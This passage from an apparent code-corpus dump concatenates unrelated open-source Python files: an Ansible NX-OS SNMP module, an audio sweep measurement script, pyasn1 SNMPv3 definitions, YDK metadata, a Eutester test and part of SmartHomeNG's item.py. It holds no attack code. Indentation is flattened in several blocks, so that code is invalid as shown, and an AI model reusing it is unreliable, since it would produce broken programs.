        community_dict['acl'] = mo.group(1)
    return community_dict
def config_snmp_community(delta, community):
    """Translate a delta dict into snmp-server community CLI commands."""
    # per-key command templates; {0} is the community string and the
    # named placeholder is filled from the delta itself
    templates = {
        'group': 'snmp-server community {0} group {group}',
        'acl': 'snmp-server community {0} use-acl {acl}',
        'no_acl': 'no snmp-server community {0} use-acl {no_acl}'
    }
    return [templates.get(key).format(community, **delta) for key in delta]
def main():
    """Ansible module entry point: converge device SNMP community config."""
    argument_spec = dict(
        community=dict(required=True, type='str'),
        access=dict(choices=['ro', 'rw']),
        group=dict(type='str'),
        acl=dict(type='str'),
        state=dict(choices=['absent', 'present'], default='present'),
    )
    argument_spec.update(nxos_argument_spec)
    module = AnsibleModule(argument_spec=argument_spec,
                           required_one_of=[['access', 'group']],
                           mutually_exclusive=[['access', 'group']],
                           supports_check_mode=True)
    warnings = list()
    check_args(module, warnings)
    results = {'changed': False, 'commands': [], 'warnings': warnings}
    access = module.params['access']
    group = module.params['group']
    community = module.params['community']
    acl = module.params['acl']
    state = module.params['state']
    # 'ro'/'rw' shorthand maps onto the built-in NX-OS groups
    if access:
        if access == 'ro':
            group = 'network-operator'
        elif access == 'rw':
            group = 'network-admin'
    # group check - ensure group being configured exists on the device
    configured_groups = get_snmp_groups(module)
    if group not in configured_groups:
        module.fail_json(msg="Group not on switch. Please add before moving forward")
    existing = get_snmp_community(module, community)
    args = dict(group=group, acl=acl)
    proposed = dict((k, v) for k, v in args.items() if v is not None)
    # delta = proposed settings that differ from what's on the device
    delta = dict(set(proposed.items()).difference(existing.items()))
    # acl='default' means: remove any ACL currently bound to the community
    if delta.get('acl') == 'default':
        delta.pop('acl')
        if existing.get('acl'):
            delta['no_acl'] = existing.get('acl')
    commands = []
    if state == 'absent':
        if existing:
            command = "no snmp-server community {0}".format(community)
            commands.append(command)
    elif state == 'present':
        if delta:
            command = config_snmp_community(dict(delta), community)
            commands.append(command)
    cmds = flatten_list(commands)
    if cmds:
        results['changed'] = True
        if not module.check_mode:
            load_config(module, cmds)
        if 'configure' in cmds:
            cmds.pop(0)
    results['commands'] = cmds
    module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
spatialaudio/sweep | log_sweep_kaiser_window_bandlimited_script5/log_sweep_kaiser_window_bandlimited_script5.py | 2 | 2156 | #!/usr/bin/env python3
"""The influence of windowing of log. bandlimited sweep signals when using a
Kaiser Window by fixing fade_out (=0) and beta (note: the code below uses
beta = 7, not beta = 2 as an earlier revision of this description stated).
fstart = 100 Hz
fstop = 5000 Hz
"""
import sys
sys.path.append('..')
import measurement_chain
import plotting
import calculation
import ir_imitation
import generation
import matplotlib.pyplot as plt
import windows
from scipy.signal import lfilter, fftconvolve
import numpy as np
# Parameters of the measuring system
fs = 44100
fstart = 100
fstop = 5000
duration = 1
pad = 4
# Generate excitation signal
excitation = generation.log_sweep(fstart, fstop, duration, fs)
N = len(excitation)
# Noise in measurement chain
noise_level_db = -30
noise = measurement_chain.additive_noise(noise_level_db)
# FIR-Filter-System
dirac_system = measurement_chain.convolution([1.0])
# Combinate system elements
system = measurement_chain.chained(dirac_system, noise)
# Lists
beta = 7
fade_in_list = np.arange(0, 1001, 1)
fade_out = 0
# Spectrum of dirac for reference
dirac = np.zeros(pad * fs)
dirac[0] = 1
dirac_f = np.fft.rfft(dirac)
def get_results(fade_in):
    """Measure one impulse response for the given Kaiser-window fade-in.

    The log sweep is windowed (fade_out and beta are fixed module-level
    parameters), zero-padded, passed through the simulated measurement
    chain (FIR system + additive noise) and deconvolved back into an
    impulse response.

    :param fade_in: fade-in length of the Kaiser window
    :return: impulse response array of the (noisy) measurement chain
    """
    excitation_windowed = excitation * windows.window_kaiser(N,
                                                             fade_in,
                                                             fade_out,
                                                             fs, beta)
    excitation_windowed_zeropadded = generation.zero_padding(
        excitation_windowed, pad, fs)
    system_response = system(excitation_windowed_zeropadded)
    ir = calculation.deconv_process(excitation_windowed_zeropadded,
                                    system_response,
                                    fs)
    return ir
with open("log_sweep_kaiser_window_bandlimited_script5.txt", "w") as f:
for fade_in in fade_in_list:
ir = get_results(fade_in)
pnr = calculation.pnr_db(ir[0], ir[1:4 * fs])
spectrum_distance = calculation.vector_distance(
dirac_f, np.fft.rfft(ir[:pad * fs]))
f.write(
str(fade_in) + " " + str(pnr) +
" " + str(spectrum_distance) + " \n")
| mit |
Just-D/chromium-1 | tools/telemetry/third_party/gsutilz/third_party/pyasn1-modules/pyasn1_modules/rfc3412.py | 127 | 1675 | #
# SNMPv3 message syntax
#
# ASN.1 source from:
# http://www.ietf.org/rfc/rfc3412.txt
#
from pyasn1.type import univ, namedtype, namedval, tag, constraint
from pyasn1_modules import rfc1905
class ScopedPDU(univ.Sequence):
    """ScopedPDU (RFC 3412, section 6): an SNMP PDU together with the
    context engine ID and context name it is scoped to."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('contextEngineId', univ.OctetString()),
        namedtype.NamedType('contextName', univ.OctetString()),
        namedtype.NamedType('data', rfc1905.PDUs())
    )
class ScopedPduData(univ.Choice):
    """ScopedPduData (RFC 3412): either a plaintext ScopedPDU or its
    encrypted serialization (when a privacy protocol is in use)."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('plaintext', ScopedPDU()),
        namedtype.NamedType('encryptedPDU', univ.OctetString()),
    )
class HeaderData(univ.Sequence):
    """SNMPv3 message header (RFC 3412): message ID, the maximum message
    size the sender can accept, a single flags octet and the security
    model identifier."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('msgID', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(0, 2147483647))),
        namedtype.NamedType('msgMaxSize', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(484, 2147483647))),
        namedtype.NamedType('msgFlags', univ.OctetString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 1))),
        namedtype.NamedType('msgSecurityModel', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(1, 2147483647)))
    )
class SNMPv3Message(univ.Sequence):
    """Top-level SNMPv3 message (RFC 3412): version, global header,
    model-specific security parameters (as an opaque octet string) and
    the scoped payload."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('msgVersion', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(0, 2147483647))),
        namedtype.NamedType('msgGlobalData', HeaderData()),
        namedtype.NamedType('msgSecurityParameters', univ.OctetString()),
        namedtype.NamedType('msgData', ScopedPduData())
    )
| bsd-3-clause |
abhikeshav/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_ncs1k_mxp_lldp_oper.py | 1 | 3663 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'LldpSnoopData.EthernetControllerNames.EthernetControllerName' : {
'meta_info' : _MetaInfoClass('LldpSnoopData.EthernetControllerNames.EthernetControllerName',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port name
''',
'name',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', True),
_MetaInfoClassMember('lldp-neighbor', ATTRIBUTE, 'str' , None, None,
[(0, 40)], [],
''' LldpNeighbor
''',
'lldp_neighbor',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', False),
],
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper',
'ethernet-controller-name',
_yang_ns._namespaces['Cisco-IOS-XR-ncs1k-mxp-lldp-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper'
),
},
'LldpSnoopData.EthernetControllerNames' : {
'meta_info' : _MetaInfoClass('LldpSnoopData.EthernetControllerNames',
False,
[
_MetaInfoClassMember('ethernet-controller-name', REFERENCE_LIST, 'EthernetControllerName' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper', 'LldpSnoopData.EthernetControllerNames.EthernetControllerName',
[], [],
''' port Name
''',
'ethernet_controller_name',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', False),
],
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper',
'ethernet-controller-names',
_yang_ns._namespaces['Cisco-IOS-XR-ncs1k-mxp-lldp-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper'
),
},
'LldpSnoopData' : {
'meta_info' : _MetaInfoClass('LldpSnoopData',
False,
[
_MetaInfoClassMember('ethernet-controller-names', REFERENCE_CLASS, 'EthernetControllerNames' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper', 'LldpSnoopData.EthernetControllerNames',
[], [],
''' Ethernet controller snoop data
''',
'ethernet_controller_names',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', False),
],
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper',
'lldp-snoop-data',
_yang_ns._namespaces['Cisco-IOS-XR-ncs1k-mxp-lldp-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper'
),
},
}
_meta_table['LldpSnoopData.EthernetControllerNames.EthernetControllerName']['meta_info'].parent =_meta_table['LldpSnoopData.EthernetControllerNames']['meta_info']
_meta_table['LldpSnoopData.EthernetControllerNames']['meta_info'].parent =_meta_table['LldpSnoopData']['meta_info']
| apache-2.0 |
shaon/eutester | testcases/cloud_admin/3-2/Euca3456.py | 6 | 3140 | '''
Created on Jan 31, 2013
@author: mmunn
Unit test : EUCA-3456 euca-describe-nodes does not return consistent results
setUp : Install Credentials,
test : run 24 instances on 6 nodes then call euca_conf --list-nodes and count the number of nodes listed.
tearDown : Removes Credentials, does not terminate instances
cloud.conf:( place in same directory as this test)
IP ADDRESS CENTOS 6.3 64 BZR [CC00 CLC SC00 WS]
IP ADDRESS CENTOS 6.3 64 BZR [NC01] [NC02] [NC03] [NC04] [NC05] [NC06]
'''
import unittest
import shutil
from eucaops import Eucaops
class Euca3456(unittest.TestCase):
    """Regression test for EUCA-3456: euca_conf --list-nodes must report
    every registered node consistently while instances are running."""
    def setUp(self):
        """Create a Eucaops connection plus keypair/group credentials."""
        #This bug is intermittent.
        #To reproduce this consistently I used 6 nodes 24 instances and 50 iterations
        #These can be adjusted, the more nodes and instances the quicker you will see the problem.
        #runInstances is run twice for a total of (2 * numIntances ) this done
        #to avoid out of resources error.
        self.numNodes = 6
        self.numIntances = 12
        self.numIterations = 1
        self.conf = "cloud.conf"
        self.tester = Eucaops( config_file=self.conf, password="foobar" )
        self.doAuth()
    def tearDown(self):
        """Remove credentials; deliberately leaves instances running."""
        #self.tester.cleanup_artifacts()
        self.tester.delete_keypair(self.keypair)
        self.tester.local("rm " + self.keypair.name + ".pem")
        shutil.rmtree(self.tester.credpath)
    def runInstances(self, numMax):
        """Launch up to numMax instances and remember the first running one."""
        #Start instance
        self.reservation = self.tester.run_instance(keypair=self.keypair.name, group=self.group, min=0, max=numMax, is_reachable=False, timeout=480)
        # Make sure the instance is running
        for instance in self.reservation.instances:
            if instance.state == "running":
                self.ip = instance.public_dns_name
                self.instanceid = instance.id
    def runSysCmd(self, cmd):
        """Run a shell command with the eucarc credentials sourced first."""
        self.source = "source " + self.tester.credpath + "/eucarc && "
        self.out = self.tester.sys(self.source + cmd)
    def doAuth(self):
        """Create keypair and authorized security group for the test run."""
        self.keypair = self.tester.add_keypair()
        self.group = self.tester.add_group()
        self.tester.authorize_group(self.group)
    def testDescribeNodes(self):
        """Repeatedly list nodes and fail if the count ever differs from
        the number of nodes configured in cloud.conf."""
        self.emi = self.tester.get_emi()
        self.runInstances(self.numIntances)
        #self.runInstances(self.numIntances)
        i = 0
        while i < self.numIterations :
            i += 1
            self.tester.debug("Running iteration " + str(i))
            self.runSysCmd("/opt/eucalyptus/usr/sbin/euca_conf --list-nodes")
            #count the returned nodes
            count = str(self.out).count("NODE")
            if count != self.numNodes :
                self.tester.debug("FAILURE only " + str(count) + " nodes listed.")
                self.fail("FAIL Incorrect number of nodes listed!")
            else :
                self.tester.debug("SUCCESS " + str(count) + " nodes listed.")
                pass
if __name__ == "__main__":
unittest.main("Euca3456")
| bsd-2-clause |
robert-budde/smarthome | lib/item_new/item.py | 2 | 55016 | #!/usr/bin/env python3
# vim: set encoding=utf-8 tabstop=4 softtabstop=4 shiftwidth=4 expandtab
#########################################################################
# Copyright 2016-2020 Martin Sinn m.sinn@gmx.de
# Copyright 2016 Christian Straßburg c.strassburg@gmx.de
# Copyright 2012-2013 Marcus Popp marcus@popp.mx
#########################################################################
# This file is part of SmartHomeNG.
#
# SmartHomeNG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SmartHomeNG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SmartHomeNG. If not, see <http://www.gnu.org/licenses/>.
#########################################################################
import logging
import datetime
import dateutil.parser
import os
import copy
import json
import threading
import time # for calls to time in eval
import math # for calls to math in eval
from math import *
from lib.plugin import Plugins
from lib.shtime import Shtime
from lib.constants import (ITEM_DEFAULTS, FOO, KEY_ENFORCE_UPDATES, KEY_ENFORCE_CHANGE, KEY_CACHE, KEY_CYCLE, KEY_CRONTAB, KEY_EVAL,
KEY_EVAL_TRIGGER, KEY_TRIGGER, KEY_CONDITION, KEY_NAME, KEY_TYPE, KEY_STRUCT,
KEY_VALUE, KEY_INITVALUE, PLUGIN_PARSE_ITEM, KEY_AUTOTIMER, KEY_ON_UPDATE, KEY_ON_CHANGE,
KEY_LOG_CHANGE, KEY_THRESHOLD,
KEY_ATTRIB_COMPAT, ATTRIB_COMPAT_V12, ATTRIB_COMPAT_LATEST)
from .property import Property
from .helpers import *
_items_instance = None
ATTRIB_COMPAT_DEFAULT_FALLBACK = ATTRIB_COMPAT_V12
ATTRIB_COMPAT_DEFAULT = ''
logger = logging.getLogger(__name__)
#####################################################################
# Item Class
#####################################################################
"""
The class ``Item`` implements the methods and attributes of an item. Each item is represented by an instance of the class ``Item``.
"""
class Item():
"""
Class from which item objects are created
The class ``Item`` implements the methods and attributes of an item. Each item is represented by an instance
of the class ``Item``. For an item to be valid and usable, it has to be part of the item tree, which is
maintained by an object of class ``Items``.
This class is used by the method ```load_itemdefinitions()`` of the **Items** object.
"""
_itemname_prefix = 'items.' # prefix for scheduler names
def __init__(self, smarthome, parent, path, config, items_instance=None):
global _items_instance
if items_instance:
_items_instance = items_instance
self._sh = smarthome
self._use_conditional_triggers = False
try:
if self._sh._use_conditional_triggers.lower() == 'true':
self._use_conditional_triggers = True
except: pass
self.plugins = Plugins.get_instance()
self.shtime = Shtime.get_instance()
self._filename = None
self._autotimer = False
self._cache = False
self.cast = cast_bool
self.__changed_by = 'Init:None'
self.__updated_by = 'Init:None'
self.__children = []
self.conf = {}
self._crontab = None
self._cycle = None
self._enforce_updates = False
self._enforce_change = False
self._eval = None # -> KEY_EVAL
self._eval_unexpanded = ''
self._eval_trigger = False
self._trigger = False
self._trigger_unexpanded = []
self._trigger_condition_raw = []
self._trigger_condition = None
self._on_update = None # -> KEY_ON_UPDATE eval expression
self._on_change = None # -> KEY_ON_CHANGE eval expression
self._on_update_dest_var = None # -> KEY_ON_UPDATE destination var
self._on_change_dest_var = None # -> KEY_ON_CHANGE destination var
self._on_update_unexpanded = [] # -> KEY_ON_UPDATE eval expression (with unexpanded item references)
self._on_change_unexpanded = [] # -> KEY_ON_CHANGE eval expression (with unexpanded item references)
self._on_update_dest_var_unexp = [] # -> KEY_ON_UPDATE destination var (with unexpanded item reference)
self._on_change_dest_var_unexp = [] # -> KEY_ON_CHANGE destination var (with unexpanded item reference)
self._log_change = None
self._log_change_logger = None
self._fading = False
self._items_to_trigger = []
self.__last_change = self.shtime.now()
self.__last_update = self.shtime.now()
self._lock = threading.Condition()
self.__logics_to_trigger = []
self._name = path
self.__prev_change = self.shtime.now()
self.__prev_update = self.shtime.now()
self.__methods_to_trigger = []
self.__parent = parent
self._path = path
self._sh = smarthome
self._threshold = False
self._threshold_data = [0,0,False]
self._type = None
self._struct = None
self._value = None
self.__last_value = None
self.__prev_value = None
self.property = Property(self)
# history
# TODO: create history Arrays for some values (value, last_change, last_update (usage: multiklick,...)
# self.__history = [None, None, None, None, None]
#
# def getValue(num):
# return (str(self.__history[(num - 1)]))
#
# def addValue(avalue):
# self.__history.append(avalue)
# if len(self.__history) > 5:
# self.__history.pop(0)
#
if hasattr(smarthome, '_item_change_log'):
self._change_logger = logger.info
else:
self._change_logger = logger.debug
#############################################################
# Initialize attribute assignment compatibility
#############################################################
global ATTRIB_COMPAT_DEFAULT
if ATTRIB_COMPAT_DEFAULT == '':
if hasattr(smarthome, '_'+KEY_ATTRIB_COMPAT):
config_attrib = getattr(smarthome,'_'+KEY_ATTRIB_COMPAT)
if str(config_attrib) in [ATTRIB_COMPAT_V12, ATTRIB_COMPAT_LATEST]:
logger.info("Global configuration: '{}' = '{}'.".format(KEY_ATTRIB_COMPAT, str(config_attrib)))
ATTRIB_COMPAT_DEFAULT = config_attrib
else:
logger.warning("Global configuration: '{}' has invalid value '{}'.".format(KEY_ATTRIB_COMPAT, str(config_attrib)))
if ATTRIB_COMPAT_DEFAULT == '':
ATTRIB_COMPAT_DEFAULT = ATTRIB_COMPAT_DEFAULT_FALLBACK
#############################################################
# Item Attributes
#############################################################
for attr, value in config.items():
if not isinstance(value, dict):
if attr in [KEY_CYCLE, KEY_NAME, KEY_TYPE, KEY_STRUCT, KEY_VALUE, KEY_INITVALUE]:
if attr == KEY_INITVALUE:
attr = KEY_VALUE
setattr(self, '_' + attr, value)
elif attr in [KEY_EVAL]:
self._process_eval(value)
elif attr in [KEY_CACHE, KEY_ENFORCE_UPDATES, KEY_ENFORCE_CHANGE]: # cast to bool
try:
setattr(self, '_' + attr, cast_bool(value))
except:
logger.warning("Item '{0}': problem parsing '{1}'.".format(self._path, attr))
continue
elif attr in [KEY_CRONTAB]: # cast to list
if isinstance(value, str):
value = [value, ]
setattr(self, '_' + attr, value)
elif attr in [KEY_EVAL_TRIGGER] or (self._use_conditional_triggers and attr in [KEY_TRIGGER]): # cast to list
self._process_trigger_list(attr, value)
elif (attr in [KEY_CONDITION]) and self._use_conditional_triggers: # cast to list
if isinstance(value, list):
cond_list = []
for cond in value:
cond_list.append(dict(cond))
self._trigger_condition = self._build_trigger_condition_eval(cond_list)
self._trigger_condition_raw = cond_list
else:
logger.warning("Item __init__: {}: Invalid trigger_condition specified! Must be a list".format(self._path))
elif attr in [KEY_ON_CHANGE, KEY_ON_UPDATE]:
self._process_on_xx_list(attr, value)
elif attr in [KEY_LOG_CHANGE]:
if value != '':
setattr(self, '_log_change', value)
self._log_change_logger = logging.getLogger('items.'+value)
# set level to make logger appear in internal list of loggers (if not configured by logging.yaml)
if self._log_change_logger.level == 0:
self._log_change_logger.setLevel('INFO')
elif attr == KEY_AUTOTIMER:
time, value, compat = split_duration_value_string(value, ATTRIB_COMPAT_DEFAULT)
timeitem = None
valueitem = None
if time.lower().startswith('sh.') and time.endswith('()'):
timeitem = self.get_absolutepath(time[3:-2], KEY_AUTOTIMER)
time = 0
if value.lower().startswith('sh.') and value.endswith('()'):
valueitem = self.get_absolutepath(value[3:-2], KEY_AUTOTIMER)
value = ''
value = self._castvalue_to_itemtype(value, compat)
self._autotimer = [ (self._cast_duration(time), value), compat, timeitem, valueitem]
elif attr == KEY_THRESHOLD:
low, __, high = value.rpartition(':')
if not low:
low = high
self._threshold = True
self.__th_crossed = False
self.__th_low = float(low.strip())
self.__th_high = float(high.strip())
self._threshold_data[0] = self.__th_low
self._threshold_data[1] = self.__th_high
self._threshold_data[2] = self.__th_crossed
logger.debug("Item {}: set threshold => low: {} high: {}".format(self._path, self.__th_low, self.__th_high))
elif attr == '_filename':
# name of file, which defines this item
setattr(self, attr, value)
else:
# the following code is executed for plugin specific attributes:
#
# get value from attribute of other (relative addressed) item
# at the moment only parent and grandparent item are supported
if (type(value) is str) and (value.startswith('..:') or value.startswith('...:')):
fromitem = value.split(':')[0]
fromattr = value.split(':')[1]
if fromattr in ['', '.']:
fromattr = attr
if fromitem == '..':
self.conf[attr] = self._get_attr_from_parent(fromattr)
elif fromitem == '...':
self.conf[attr] = self._get_attr_from_grandparent(fromattr)
else:
self.conf[attr] = value
# logger.warning("Item rel. from (grand)parent: fromitem = {}, fromattr = {}, self.conf[attr] = {}".format(fromitem, fromattr, self.conf[attr]))
else:
self.conf[attr] = value
self.property.init_dynamic_properties()
#############################################################
# Child Items
#############################################################
for attr, value in config.items():
if isinstance(value, dict):
child_path = self._path + '.' + attr
try:
child = Item(smarthome, self, child_path, value)
except Exception as e:
logger.exception("Item {}: problem creating: {}".format(child_path, e))
else:
vars(self)[attr] = child
_items_instance.add_item(child_path, child)
self.__children.append(child)
#############################################################
# Cache
#############################################################
if self._cache:
self._cache = self._sh._cache_dir + self._path
try:
self.__last_change, self._value = cache_read(self._cache, self.shtime.tzinfo())
self.__last_update = self.__last_change
self.__prev_change = self.__last_change
self.__prev_update = self.__last_change
self.__changed_by = 'Cache:None'
self.__updated_by = 'Cache:None'
except Exception as e:
logger.warning("Item {}: problem reading cache: {}".format(self._path, e))
#############################################################
# Type
#############################################################
#__defaults = {'num': 0, 'str': '', 'bool': False, 'list': [], 'dict': {}, 'foo': None, 'scene': 0}
if self._type is None:
self._type = FOO # MSinn
if self._type not in ITEM_DEFAULTS:
logger.error("Item {}: type '{}' unknown. Please use one of: {}.".format(self._path, self._type, ', '.join(list(ITEM_DEFAULTS.keys()))))
raise AttributeError
self.cast = globals()['cast_' + self._type]
#############################################################
# Value
#############################################################
if self._value is None:
self._value = ITEM_DEFAULTS[self._type]
try:
self._value = self.cast(self._value)
except:
logger.error("Item {}: value {} does not match type {}.".format(self._path, self._value, self._type))
raise
self.__prev_value = self.__last_value
self.__last_value = self._value
#############################################################
# Cache write/init
#############################################################
if self._cache:
if not os.path.isfile(self._cache):
cache_write(self._cache, self._value)
logger.warning("Item {}: Created cache for item: {}".format(self._cache, self._cache))
#############################################################
# Plugins
#############################################################
for plugin in self.plugins.return_plugins():
#plugin.xxx = [] # Empty reference list list of items
if hasattr(plugin, PLUGIN_PARSE_ITEM):
update = plugin.parse_item(self)
if update:
try:
plugin._append_to_itemlist(self)
except:
pass
self.add_method_trigger(update)
def _split_destitem_from_value(self, value):
"""
For on_change and on_update: spit destination item from attribute value
:param value: attribute value
:return: dest_item, value
:rtype: str, str
"""
dest_item = ''
# Check if assignment operator ('=') exists
if value.find('=') != -1:
# If delimiter exists, check if equal operator exists
if value.find('==') != -1:
# equal operator exists
if value.find('=') < value.find('=='):
# assignment operator exists in front of equal operator
dest_item = value[:value.find('=')].strip()
value = value[value.find('=')+1:].strip()
else:
# if equal operator does not exist
dest_item = value[:value.find('=')]
value = value[value.find('=')+1:].strip()
return dest_item, value
    def _castvalue_to_itemtype(self, value, compat):
        """
        casts the value to the type of the item, if backward compatibility
        to version 1.2 (ATTRIB_COMPAT_V12) is not enabled

        If backward compatibility is enabled, the value is returned unchanged

        :param value: value to be casted
        :param compat: compatibility attribute (ATTRIB_COMPAT_V12 or ATTRIB_COMPAT_LATEST)
        :return: return casted value (unchanged when compat != latest)
        """
        # casting of value, if compat = latest
        if compat == ATTRIB_COMPAT_LATEST:
            if self._type != None:
                # look up the cast helper (cast_bool, cast_num, ...) matching the item type
                mycast = globals()['cast_' + self._type]
                try:
                    value = mycast(value)
                except:
                    logger.warning("Item {}: Unable to cast '{}' to {}".format(self._path, str(value), self._type))
                    # fall back to the type's empty/default value
                    if isinstance(value, list):
                        value = []
                    elif isinstance(value, dict):
                        value = {}
                    else:
                        value = mycast('')
            else:
                logger.warning("Item {}: Unable to cast '{}' to {}".format(self._path, str(value), self._type))
        return value
def _cast_duration(self, time):
"""
casts a time value string (e.g. '5m') to an duration integer
used for autotimer, timer, cycle
supported formats for time parameter:
- seconds as integer (45)
- seconds as a string ('45')
- seconds as a string, trailed by 's' ('45s')
- minutes as a string, trailed by 'm' ('5m'), is converted to seconds (300)
:param time: string containing the duration
:param itempath: item path as additional information for logging
:return: number of seconds as an integer
"""
if isinstance(time, str):
try:
time = time.strip()
if time.endswith('m'):
time = int(time.strip('m')) * 60
elif time.endswith('s'):
time = int(time.strip('s'))
else:
time = int(time)
except Exception as e:
logger.warning("Item {}: _cast_duration ({}) problem: {}".format(self._path, time, e))
time = False
elif isinstance(time, int):
time = int(time)
else:
logger.warning("Item {}: _cast_duration ({}) problem: unable to convert to int".format(self._path, time))
time = False
return(time)
    def _build_cycledict(self, value):
        """
        builds a dict for a cycle parameter from a duration_value_string

        This dict is to be passed to the scheduler to circumvent the parameter
        parsing within the scheduler, which can't do casting

        :param value: raw attribute string containing duration, value (and compatibility)
        :return: cycle-dict {duration_in_seconds: casted_value} for a call to scheduler.add
        """
        time, value, compat = split_duration_value_string(value, ATTRIB_COMPAT_DEFAULT)
        # seconds between scheduler invocations
        time = self._cast_duration(time)
        # value assigned on each cycle, casted to the item's type
        value = self._castvalue_to_itemtype(value, compat)
        cycle = {time: value}
        return cycle
"""
--------------------------------------------------------------------------------------------
"""
def _build_on_xx_list(self, on_dest_list, on_eval_list):
"""
build on_xx data
"""
on_list = []
if on_dest_list is not None:
if isinstance(on_dest_list, list):
for on_dest, on_eval in zip(on_dest_list, on_eval_list):
if on_dest != '':
on_list.append(on_dest.strip() + ' = ' + on_eval)
else:
on_list.append(on_eval)
else:
if on_dest_list != '':
on_list.append(on_dest_list + ' = ' + on_eval_list)
else:
on_list.append(on_eval_list)
return on_list
    def _process_eval(self, value):
        """
        Process the 'eval' attribute: store the raw expression and a copy
        with relative item references expanded to absolute paths.

        An empty value disables the eval expression (self._eval = None).

        :param value: eval expression from the item configuration
        """
        if value == '':
            self._eval_unexpanded = ''
            self._eval = None
        else:
            self._eval_unexpanded = value
            # expand relative item references ('sh.<relpath>') to absolute paths
            value = self.get_stringwithabsolutepathes(value, 'sh.', '(', KEY_EVAL)
            self._eval = value
    def _process_trigger_list(self, attr, value):
        """
        Process an eval_trigger / trigger attribute: keep the unexpanded
        item paths and store an absolute-path copy used at runtime.

        :param attr: name of the attribute (used for log entries)
        :param value: a single item path or a list of item paths
        """
        if isinstance(value, str):
            # a single path is normalized to a one-element list
            value = [value, ]
        self._trigger_unexpanded = value
        expandedvalue = []
        for path in value:
            expandedvalue.append(self.get_absolutepath(path, attr))
        self._trigger = expandedvalue
    def _process_on_xx_list(self, attr, value):
        """
        Process an on_update / on_change attribute: split each entry into an
        optional destination item and an eval expression, and store both the
        raw (unexpanded) and the absolute-path variants as instance attributes
        '_<attr>', '_<attr>_unexpanded', '_<attr>_dest_var' and
        '_<attr>_dest_var_unexp'.

        :param attr: attribute name (KEY_ON_UPDATE or KEY_ON_CHANGE)
        :param value: expression or list of expressions, each optionally of
                      the form '<dest item> = <eval expression>'
        """
        if isinstance(value, str):
            value = [value]
        val_list = []
        val_list_unexpanded = []
        dest_var_list = []
        dest_var_list_unexp = []
        for val in value:
            # separate destination item (if it exists)
            dest_item, val = self._split_destitem_from_value(val)
            dest_var_list_unexp.append(dest_item)
            # expand relative item paths
            dest_item = self.get_absolutepath(dest_item, KEY_ON_CHANGE).strip()
            # val = 'sh.'+dest_item+'( '+ self.get_stringwithabsolutepathes(val, 'sh.', '(', KEY_ON_CHANGE) +' )'
            val_list_unexpanded.append(val)
            val = self.get_stringwithabsolutepathes(val, 'sh.', '(', KEY_ON_CHANGE)
            # logger.warning("Item __init__: {}: for attr '{}', dest_item '{}', val '{}'".format(self._path, attr, dest_item, val))
            val_list.append(val)
            dest_var_list.append(dest_item)
        setattr(self, '_' + attr + '_unexpanded', val_list_unexpanded)
        setattr(self, '_' + attr, val_list)
        setattr(self, '_' + attr + '_dest_var', dest_var_list)
        setattr(self, '_' + attr + '_dest_var_unexp', dest_var_list_unexp)
        return
def _get_last_change(self):
return self.__last_change
def _get_last_change_age(self):
delta = self.shtime.now() - self.__last_change
return delta.total_seconds()
def _get_last_change_by(self):
return self.__changed_by
def _get_last_update(self):
return self.__last_update
def _get_last_update_by(self):
return self.__updated_by
def _get_last_update_age(self):
delta = self.shtime.now() - self.__last_update
return delta.total_seconds()
def _get_last_value(self):
return self.__last_value
def _get_prev_change(self):
return self.__prev_change
def _get_prev_change_age(self):
delta = self.__last_change - self.__prev_change
if delta.total_seconds() < 0.0001:
return 0.0
return delta.total_seconds()
def _get_prev_change_by(self):
return 'N/A'
def _get_prev_update(self):
return self.__prev_change
def _get_prev_update_age(self):
delta = self.__last_update - self.__prev_update
